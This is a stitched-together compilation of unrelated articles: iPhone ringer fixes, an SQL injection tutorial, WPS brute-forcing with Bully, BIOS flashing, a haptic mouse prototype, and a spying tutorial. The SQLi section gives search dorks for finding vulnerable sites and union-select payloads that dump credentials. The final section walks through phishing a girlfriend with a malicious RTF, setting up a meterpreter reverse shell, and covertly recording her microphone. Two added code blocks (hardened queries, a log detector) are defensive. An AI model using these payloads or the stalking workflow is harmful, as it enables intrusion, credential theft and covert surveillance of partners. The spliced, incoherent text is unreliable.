It can be a puzzling situation: you’re getting voicemails and
missing calls, but your iPhone doesn’t ring. It may seem mysterious, or
maybe just really annoying, but either way, it needs to be fixed.
There's not one single possible cause for why an iPhone stops ringing—it
could be because your phone is broken, but there are a lot of things to
try before concluding that—but the fixes are all relatively easy. If
you're not hearing your iPhone's ringer, there could be 5 culprits:
A broken speaker
Mute is turned on
Do Not Disturb is turned on
You've blocked the phone number
A problem with your ringtone.
Does Your Speaker Work?
The speaker at the bottom of your iPhone is used for every sound
your phone makes. Whether that's playing music and games, watching
movies, or hearing a ringtone for incoming calls, the speaker is what
makes it all happen. If you're not hearing calls, it could be that your
speaker is broken. Try playing some music or a YouTube video,
and make sure to turn up the volume. If you hear audio fine, then
that's not the problem. But if no sound comes out when it should, and
you've got the volume up loud, it could be that you need to repair your
iPhone's speaker.
Another boring day, and I decided to check out Null-Byte for some cool
tuts. Found none today, so I tried searching old threads and found SQL
Injection tutorials, but to my surprise there wasn't a tutorial about
Error Based, Normal, Time and others, I mean the basic SQL Injection
types we all find around every day. The ones I found were half though ..
Today, I would like to spend my boring day writing a tutorial about SQLi Error Based.
SQLi { SQL Injection }
SQLi is a code injection technique, used to attack data-driven applications,
in which malicious SQL statements are inserted into an entry field for
execution (e.g. to dump the database contents to the attacker). SQL
injection must exploit a security vulnerability in an application's
software, for example, when user input is either incorrectly filtered
for string literal escape characters embedded in SQL statements or user
input is not strongly typed and unexpectedly executed. SQL injection is
mostly known as an attack vector for websites but can be used to attack
any type of SQL database.
Imagine dropping an SQL command to a database to do what you want: Select, Insert, Update, and my best friend Drop. Let's take an unfiltered application that queries a database with the preferred user input.
Statement: SELECT * FROM `users` WHERE `username` = 'sky'
'sky' is the user-supplied data. Should a user like me type:
> sky';DROP TABLE users
> sky' or '1'='1
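Why the unfiltered statement misbehaves, and what the fix looks like, as an added example that is not part of the original tutorial. It assumes a small in-memory SQLite database with constructed rows; the function names and the `products` table are hypothetical, and the `id` value is the one the tutorial uses further down.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password)
            VALUES ('sky', 'constructed-hash-1'), ('admin', 'constructed-hash-2');
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price INTEGER, stock INTEGER);
        INSERT INTO products VALUES (5, 'widget', 10, 3);
        """
    )
    return db


def find_user_unfiltered(db, username):
    # Vulnerable on purpose: the input becomes part of the SQL text, so a
    # quote in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchall()


def find_user_bound(db, username):
    # Hardened: the statement text is fixed; the input travels as a bound
    # value and is only ever compared as data.
    return db.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchall()


def get_product_unfiltered(db, raw_id):
    # Vulnerable on purpose: an "id" that is never checked to be a number.
    sql = "SELECT id, name, price, stock FROM products WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def get_product_typed(db, raw_id):
    # Hardened: strong typing first (ASCII digits only), then a bound parameter.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    return db.execute(
        "SELECT id, name, price, stock FROM products WHERE id = ?", (int(raw_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "sky' or '1'='1"              # second input from the tutorial
    union_value = "5 union select 1,2,3,4--"  # id value from the tutorial
    print("unfiltered user lookup:", find_user_unfiltered(db, tautology))
    print("bound user lookup:     ", find_user_bound(db, tautology))
    print("unfiltered product:    ", get_product_unfiltered(db, union_value))
    try:
        get_product_typed(db, union_value)
    except ValueError as exc:
        print("typed product lookup rejected input:", exc)
```

With bound parameters the quote never reaches the SQL parser, so the same input that returned every row now matches nothing.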
Please don't try these queries on other people's work, otherwise you're going to cause great data loss to the owner.
Query 1: Will drop the table, meaning: empty the whole table's data.
Query 2: Will select all the data in the database, which could be credit card details. You could cause a great data breach, since I don't think you would report it if you found Obama's credit card details in the application's database. Although one or two people will report. OK, let's get practical.
How do you know when you need Error Based SQLi?
This is the most important part of web hacking: the type of injection to use in different situations. You can use Error Based Injections when you get the following errors:
> Unknown column in 'order clause'
> The used SELECT statements have a different number of columns
> You have an error in your SQL syntax; check the manual ...
> Warning: ....
There are others, but these are what one usually finds the most .... Now take note of these errors. You'll be needing them.
SQLi - Error Based
Let's start by finding some vulnerable sites. There are many vulnerable sites so hope you find a nice and good one. You can search vulnerable sites through vulnerable dorks: trainers.php?id= playold.php?id= declarationmore.php?declid= Pageid= games.php?id= newsDetail.php?id= staffid= historialeer.php?num= product-item.php?id= newsview.php?id= humor.php?id= communiquedetail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id=
You can get more here
Open Google:
Type: inurl: followed by our dork:
inurl:game.php?id=
Now when you're presented with the search results: take your time and visit each site carefully
To check if a site is vulnerable: append an apostrophe ( ' )
If you find the errors I specified above then we are good to go, otherwise try another site: come back when you find one.
We will need our vulnerable column number here ... Above we got 4 i.e 1,2,3,4--
Now we need to find the injectable columns ...
To do that, site url followed by union select function and the vulnerable columns and also followed by our two hyphens (--) ...
> http://vulnerablesite.com/buy.php?id=5 union select columns --
Full URL: http://vulnerablesite.com/buy.php?id=5 union select 1,2,3,4--
After executing the URL .... we will need to study the page to find the
numbers that appear, because they are our only gateway to inject
commands to the database ... Study the image: Normal and After Query
From the study of the page: After Query ... Result: 2,3,4
Injectable Columns are 2,3,4
Getting Database Name; Database Version; Current Database User
Database Name
Now from the above injectable columns 2,3,4 .... we could replace any one of them with our query ... We will choose 2
To get the database name: Replace the preferred injectable column with database() ...
Study: Before we execute the query ... append a hyphen before our id parameter and continue with the query id=-5
In this post, we have Vulnerable Columns { 1,2,3,4 } and Injectable Columns { 2,3,4 } .... You need to take note of these parameters .. Since we chose 2 as our preferred injectable column number .... this is how the query is gonna be ...
> http://site.com/buy.php?id=-5 union select 1,database(),3,4--
Notice: We replaced our preferred injectable column 2 with the query database()
> http://vulnerablesite.com/buy.php?id=-5 union select 1,database(),3,4--
Note: Our preferred injectable column number will be replaced with the database output ...
Result: btslab
My results will be different from yours since I am using my localhost, not a
real website, so don't be like .... You're not doing the right thing ...
Database Version
Very simple: Just replace database() with @@version
Result: 5.6.20
Current Database User
Same applies to the database user: just replace @@version with user()
Result: root@localhost
Getting Current Table In Database { BTSLAB }
Replace parameter with and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--
Full URL: http://target.com/buy.php?id=-5 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--
Result: posts,users
Getting Columns From Table
I don't know about you, but I won't go for table:posts while I have seen table:users .......... "Hell Yeah .... Getting Table: users"
Using Table - users
Warning: You will need to convert the table name to MySQL Char
Download HackBar. Click on the drop-down menu SQL and click on MySQL .... Another drop-down appears; choose MySQL Char()
After choosing MySQL Char() .. a JavaScript application dialog will pop up
and prompt us for our text to be converted .... We type our preferred
table name ... users
After clicking OK .... the converted text can be found in the add-on's work bar ...
Now users ==> CHAR(117, 115, 101, 114, 115) Done
Let's continue our query ..
Replace parameter with and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
Note: table name: users has been converted ..
Full URL: http://target.com/buy.php?id=-5 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
Result: ID,username,email,password,about,privilege,avatar,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
Getting Column Data of a selected Column name
Still don't know about you but am gonna go for column data: username and password
Replace parameter with and 1=2 union select 1,2,group_concat(username,0x3a,password) from users--
Full URL: http://target.com/buy.php?id=-5 and 1=2 union select 1,2,group_concat(username,0x3a,password) from users--
Result: sky:bbc206c3aeebe3ed00cd14ec6e7f862c
What You Do With The Data Is Not My Part
Now you can try cracking the hash with online services ... I created one sometime ago ... You can go to my service here
Have A Nice Day !!! .... And please be kind to report if you find any vulnerability with my website ... Sorry for bad English and long article ... WANTED TO EXPRESS MYSELF ... My Waist again .. Catch you later guys ... Please correct me if I mistyped or made a wrong move ...
And and .... the last thing I don't wanna miss, otherwise get my butts to jail .... This Tutorial is for Educational Purposes. Thank you.
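From the defender's side, the requests in this tutorial leave a recognisable trail in web server access logs. The following is an added example, not part of the original tutorial: it decodes each query-string value and flags the patterns the tutorial relies on (the trailing apostrophe, union select, information_schema, group_concat, CHAR() encoding, the trailing --). The log lines are constructed and the rule names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines; the addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.4 - - [01/Jan/2024:10:00:01 +0000] "GET /buy.php?id=5 HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /buy.php?id=5%27 HTTP/1.1" 500 310
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /buy.php?id=-5+union+select+1,database(),3,4-- HTTP/1.1" 200 498
203.0.113.9 - - [01/Jan/2024:10:00:14 +0000] "GET /buy.php?id=-5%20and%201=2%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables-- HTTP/1.1" 200 530
198.51.100.4 - - [01/Jan/2024:10:00:20 +0000] "GET /profile.php?name=O%27Brien HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})'
)

# Each rule is matched against one URL-decoded parameter value.
RULES = {
    # A short token that ends in a single quote: the apostrophe test.
    "quote_probe": re.compile(r"^[\w-]*'$"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "info_function": re.compile(r"@@version|\b(?:database|user)\s*\(\s*\)", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+", re.I),
    # A value that ends in an SQL comment marker.
    "comment_tail": re.compile(r"--\s*$"),
}


def scan(log_text):
    """Return (ip, path, status, [rule names]) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        ip, target, status = match.groups()
        parts = urlsplit(target)
        hits = set()
        # parse_qsl percent-decodes values and turns '+' into a space.
        for _name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits.update(name for name, rx in RULES.items() if rx.search(value))
        if hits:
            findings.append((ip, parts.path, int(status), sorted(hits)))
    return findings


def sources_by_hits(findings):
    """Count flagged requests per client address."""
    counts = {}
    for ip, *_rest in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print(sources_by_hits(scan(SAMPLE_LOG)))
```

The `O'Brien` line is left alone because the quote is not at the end of the value; a 500 response on a `quote_probe` hit is the combination worth alerting on first.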
Welcome back, to Grown tz hackers!
Like anything in life, there are multiple ways of getting a hack done. In fact, good
hackers usually have many tricks up their sleeve to hack into a system.
If they didn't, they would not usually be successful. No hack works on
every system and no hack works all of the time.
I have demonstrated many ways to hack Wi-Fi here on Null Byte, including cracking WEP and WPA2 passwords and creating an Evil Twin and Rogue AP.
A few years back, Alex Long demonstrated how to use Reaver
to hack the WPS PIN on those systems with old firmware and WPS enabled.
Recently, a new WPS-hacking tool has appeared on the market and is
included in our Kali hacking distribution. Its name, appropriately, is Bully.
Why WPS Is So Vulnerable
WPS stands for Wi-Fi Protected Setup and was designed to make setting up a secure AP
simpler for the average homeowner. First introduced in 2006, by 2011 it
was discovered that it had a serious design flaw. The WPS PIN could be
brute-forced rather simply.
With only 7 unknown digits in the PIN,
there are just 9,999,999 possibilities, and most systems can attempt
that many combinations in a few hours. Once the WPS PIN is discovered,
the user can use that PIN to find the WPA2 preshared key (password).
Since a brute-force attack against a WPA2 protected AP can take hours to
days, if this feature is enabled on the AP and not upgraded, it can be a
much faster route to getting the PSK.
The Keys to Success
It's important to note, though, that new APs no longer have this vulnerability. This
attack will only work on APs sold in the window between 2006 and early
2012. Since many families keep their APs for many years, there are still
many of these vulnerable ones around.
If you aren't familiar with wireless hacking, I strongly suggest that you read my introduction on the Aircrack-ng suite of tools. In addition, make certain that you have an Aircrack-ng compatible wireless card, otherwise this will simply be an exercise in frustration.
Step 1: Fire Up Kali
Let's start by firing our favorite hacking Linux distribution, Kali. Then open a terminal that looks like this:
To make certain we have some wireless connections and their designation, we can type:
kali > iwconfig
As we can see, this system has a wireless connection designated wlan0. Yours may be different, so make certain to check.
Step 2: Put Your Wi-Fi Adapter in Monitor Mode
The next step is to put your Wi-Fi adapter in monitor mode. This is similar
to promiscuous mode on a wired connection. In other words, it enables
us to see all the packets passing through the air past our wireless
adapter. We can use one of the tools from the Aircrack-ng suite,
Airmon-ng, to accomplish this task.
kali > airmon-ng start wlan0
Next, we need to use Airodump-ng to see the info on the wireless APs around us.
kali > airodump-ng mon0
As you can see, there are several APs visible to us. I'm interested in the
first one: "Mandela2." We will need its BSSID (MAC address), its
channel, and its SSID to be able to crack its WPS PIN.
Step 3: Use Airodump-ng to Get the Necessary Info
Finally, all we need to do is to put this info into our Bully command.
kali > bully mon0 -b 00:25:9C:97:4F:48 -e Mandela2 -c 9
Let's break down that command to see what's happening.
mon0 is the name of the wireless adapter in monitor mode.
-b 00:25:9C:97:4F:48 is the BSSID of the vulnerable AP.
-e Mandela2 is the SSID of the AP.
-c 9 is the channel the AP is broadcasting on.
All of this information is available in the screen above with Airodump-ng.
Step 4: Start Bully
When we hit enter, Bully will start to try to crack the WPS PIN.
Now, if this AP is vulnerable to this attack, bully will spit out the WPS PIN and the AP password within 3 to 5 hours.
Your BIOS, or Basic Input Output System,
is the firmware on your motherboard responsible for initializing your
computer's hardware when it is first powered on. It probes for video
adapters, RAM, the whole works. The BIOS provides a small library
of basic input/output functions used to operate and control the
peripherals such as the keyboard, text display functions and so forth,
and these software library functions are callable by external software
such as the OS and system software within said OS.
When you enter your BIOS,
the BIOS settings allow us to manipulate devices in the computer to do
some pretty cool things. We can overclock parts, create RAID arrays, add
boot passwords and much more. By default, most manufacturers don't
allow you to have many settings, especially if you're a laptop user
(gaming laptop users excluded). This can really be a bummer, especially
when you're really close to running a game perfectly and your hardware
can't handle it; overclocking can be that final boost that you need.
Even if overclocking isn't your thing, you can downclock to save power.
Having a great BIOS allows users to do great things, but as we've said, a lot of computers lack this. The Null Byte alternative is to hack it! If we hack our BIOS, we can give our computer features it may not have even had before, like USB booting. Note that not all BIOS have hacked versions available.
Requirements
Windows OS
Know your BIOS name and version or computer model
Warning
You may brick your
computer's motherboard if you flash incorrectly or an error occurs,
rendering it unusable. Don't turn your computer off, or do anything else
during a flash.
Step 1 Find the Right Hacked BIOS for You
To find our BIOS, take the name of it and use relevant queries. I'll be looking for a hacked A05 BIOS for an Alienware M18x.
Head to Bios Mods. If you can't find it here, do a simple Google search. I used "hacked m18x bios a05" , which returned a lovely unlocked A05 BIOS.
Search for your BIOS, computer model, or both.
Step 2 Flash the BIOS
Turn
off all of the running software that you can. Having software running
can cause a bad flash, which will brick your motherboard.
Extract the utility archive.
Load up the tool and pick your cracked BIOS version if necessary.
Wait for the flash to complete.
When you reboot, you should have a BIOS with a plethora of new options like the example below.
You've seen the felt mouse, which made computer clicking comfortable and chic, now brace yourself for something a little more interactive—DataBot.
DataBot hails from the clever minds of Jan Barth and Roman Grasy,
two Interaction Design students based in Germany who wanted to create
an entirely different way to understand computer data, other than visual
representations. Instead of just looking at your files and folders,
their DataBot Mouse assigns physical properties to the data and
interacts with you through haptic technology—touching your senses.
Developed with Arduino and VVVV, the prototype consists of a small servo-motor inside an optical mouse, which brakes the little ball. It communicates three different data properties to the user.
It can show the weight of files and folders by braking with different
force, according to file size. You can set a custom weight for files
and folders so you can find important data more easily, just like the
color-marking function in Mac OS X. And you can see the activity of your
files and folders—showing how many times a file was opened or how busy a
folder has been recently—by "breathing" with different intervals.
All settings are customizable, so you can fit it to your individual needs.
And it doesn't stop with computer mice. They've also developed a family of DataBot Hard Drives. The basic construction of one of the hard drives consists of a 3D-printed case, a servo-motor and some red and blue LEDs.
The
hard drive grows or shrinks based on how much space is used, compared
to the total amount available. Just by looking at it, you can always see
its current fill level. During file transmissions, it visualizes the
progress with a blinking blue light, decreasing speed until the
transmission is complete. And if an error occurs, the hard drive will
shake and flash red lights.
Welcome back, my rookie hackers!
Now that nearly
everyone and everyplace has a computer, you can use those remote
computers for some good old "cloak and dagger" spying. No longer is
spying something that only the CIA, NSA, KGB, and other intelligence
agencies can do—you can learn to spy, too.
In this brand new series,
we will explore how we can use the ubiquity of the computer to peek in
on just about anyone and anyplace. Unlike the spy movies of yesteryear
where the spy had to place a listening device in the lamp or in a
houseplant, as long as there is a computer in the room, it can be used
as a "bug."
We will examine how to turn that commonplace computer
into our own bug to listen in on conversations, use as a spy camera,
track Internet searches, and more. James Bond and Q have nothing on us!
In
this first part, I will show you how to convert any computer, anywhere,
into a listening device. As nearly every room now has a computer in it,
you can put a bug in nearly every room, unnoticed and undetected.
Step 1: Fire Up Kali
The first step, of course, is to fire up Kali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.
Step 2: Compromise the Remote Computer
Probably the best way to compromise your target's computer is to use a carefully crafted email that will get the target to click on a document or link. Inside that document or link, we will embed a rootkit/listener that will enable us to turn on the built-in microphone on their computer and save any conversations in the room where it is located.
Since we know the victim (it may be a girlfriend, neighbor, spouse, business
associate, foreign diplomat, foreign spy, etc.), we can be very
specific in crafting an email that would gain their acceptance. The key,
of course, is to create a document that sounds compelling, or at least
interesting, to get the victim to click on the Word document.
This becomes an exercise in social engineering
at this point. If the victim is a girlfriend/boyfriend, you might try
sending a love letter. If the victim is a business associate, it might
be Word or Excel document with a sales or other report. If it is a
neighbor, it may be a link to a community webpage.
I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.
Step 3: Find an Exploit
Now, if we want to exploit a Windows 7
system (most Windows 7 exploits will work on Windows 8), we will need
to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's
Word application.
This past spring, Microsoft revealed that
hackers had found a vulnerability in Microsoft Word and Office Web apps
that could allow remote code execution (read, rootkit). Here is
Microsoft's announcement on their Technet Security Bulletin below (more info on Technet can be found here).
As you can see, they have named it MS14-017. When we do a search in Metasploit for this vulnerability/exploit, we find: exploit/windows/fileformat/ms14_017_rtf
Now that we have found the proper exploit, let's load it into Metasploit by typing: msf >use exploit/windows/fileformat/ms14_017_rtf
Once we have it loaded, let's type "info" to find more about this exploit.
Now, "show options."
As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.
Step 4: Set the FILENAME
In this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf." set FILENAME lovepoem.rtf
Step 5: Set the Payload
Next, we need to set the payload to place in her "lovepoem." In this case, let's send the meterpreter as it gives us almost unlimited power and control over the hacked system. msf > set PAYLOAD windows/meterpreter/reverse_tcp
Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.
Finally,
simply type "exploit." This will create a Word file called "lovepoem"
that will place the meterpreter on her system that we can then connect
to.
Step 6: Open a Multi-Handler for the Connection
For the next step, we need to open a multi-handler to receive the connection back to our system. msf > use exploit/multi/handler msf > set PAYLOAD windows/meterpreter/reverse_tcp
And finally, set the LHOST to your IP.
Step 7: Send the Love Poem to Your Girlfriend
Now
that we have created our malicious file, you need to send it to your
girlfriend. You likely will want to send it via an email attachment with
a note telling her that you wrote her a short poem to express your
love for her. Knowing that it is from you, I'm sure she will click on it
as she loves you dearly and trusts you completely.
Step 8: Compromise Her System
When she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.
Step 9: Record with the Microphone
What we will
do next is enable the microphone on her computer and begin to record all
of the sounds within earshot of it. Metasploit has a Ruby script that
will enable the microphone on the target machine and begin to record all
sounds and conversations nearby. If we go to our ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.
From the meterpreter prompt, simply type: meterpreter > run sound_recorder - l /root
This will start the microphone on her computer and store the recorded conversations and sounds in a file in the /root
directory on your system. Of course, you can choose any directory to
store these recordings. Just make certain you have adequate hard drive
space, as these files can become very large. When you want to hear what
was recorded, simply open the stored file on your system.
Stay Tuned for More Spying Fun...
No
longer is spying the exclusive province of the CIA, NSA, KGB, or MI5.
With just a little computer skills, anyone can be a spy. In future tutorials, I will show you how to turn on webcams, take screenshots, download confidential files from anyone's computer, and more.